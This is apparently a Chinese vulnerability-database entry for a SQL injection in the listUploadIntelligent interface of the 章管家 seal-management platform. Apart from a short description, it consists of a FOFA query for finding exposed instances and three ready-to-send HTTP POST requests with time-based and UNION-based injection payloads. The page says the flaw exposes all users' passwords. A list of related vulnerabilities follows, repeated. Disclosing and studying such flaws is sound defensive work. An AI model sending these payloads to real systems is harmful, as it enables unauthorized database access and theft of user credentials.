章管家listUploadIntelligent接口存在sql注入漏洞

日期: 2024-08-13 | 影响软件: 章管家 | POC: 已公开

漏洞描述

章管家是上海建业信息科技股份有限公司研发的国内专业智能印章管理平台，专注为传统印章管理提供整套解决方案。章管家存在sql注入漏洞，攻击者可以获取数据权限。

PoC代码

# 章管家listUploadIntelligent接口存在sql注入漏洞



listUploadIntelligent接口存在 SQL 注入漏洞。攻击者可以通过构造特定的 POST 请求注入恶意 SQL 代码，利用该漏洞对数据库执行任意 SQL 操作，获取所有用户的账户密码信息。



## fofa



```java

app="章管家-印章智慧管理平台"

```



## poc



```java

POST /app/message/listUploadIntelligent.htm?&person_id=1&unit_id=1 HTTP/1.1

Host:127.0.0.1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0

Accept: application/json, text/javascript, */*; q=0.01

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

X-Requested-With: XMLHttpRequest

Connection: close

Content-Type: application/x-www-form-urlencoded

Content-Length: 119



pageNo=1&pageSize=20&keyWord=&startDate=&endDate=&deptIds=&type_id=&is_read=-1 and (select*from(select%0Asleep(10))x)

```



```java

POST /app/message/listUploadIntelligent.htm?token=dingtalk_token&person_id=1&unit_id=1 HTTP/1.1

Host:127.0.0.1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0

Accept: application/json, text/javascript, */*; q=0.01

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

X-Requested-With: XMLHttpRequest

Connection: close

Content-Type: application/x-www-form-urlencoded

Content-Length: 119



pageNo=1&pageSize=20&keyWord=&startDate=&endDate=&deptIds=&type_id=&is_read=-1 and (select*from(select%0Asleep(10))x)

```



```java

POST /app/message/listUploadIntelligent.htm?token=dingtalk_token&person_id=1&unit_id=1 HTTP/1.1

Host:127.0.0.1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0

Accept: application/json, text/javascript, */*; q=0.01

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

X-Requested-With: XMLHttpRequest

Connection: close

Cookie: 

Content-Type: application/x-www-form-urlencoded

Content-Length: 131



pageNo=1&pageSize=20&keyWord=&startDate=&endDate=&deptIds=&type_id=&is_read=-1 union select md5(123456),2,3,4,5,6,7,8,9,10,11,12 --

```



![图片.png](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408121121661.png)







## 漏洞来源



- https://forum.butian.net/article/528

漏洞描述

PoC代码

相关漏洞推荐

章管家 /api/personSeal/UserCreateService 权限绕过漏洞 无POC

章管家 /api/personSeal_jdy/saveUser.htm 未授权访问漏洞 无POC

章管家 /listUploadIntelligent.htm SQL 注入漏洞 无POC

LemonLDAP::NG 操作系统命令注入漏洞 无POC

万户OA informationmanager_upload.jsp 任意文件上传漏洞 无POC

章管家 /api/personSeal/UserCreateService 权限绕过漏洞无POC

章管家 /api/personSeal_jdy/saveUser.htm 未授权访问漏洞无POC

章管家 /listUploadIntelligent.htm SQL 注入漏洞无POC

LemonLDAP::NG 操作系统命令注入漏洞无POC

万户OA informationmanager_upload.jsp 任意文件上传漏洞无POC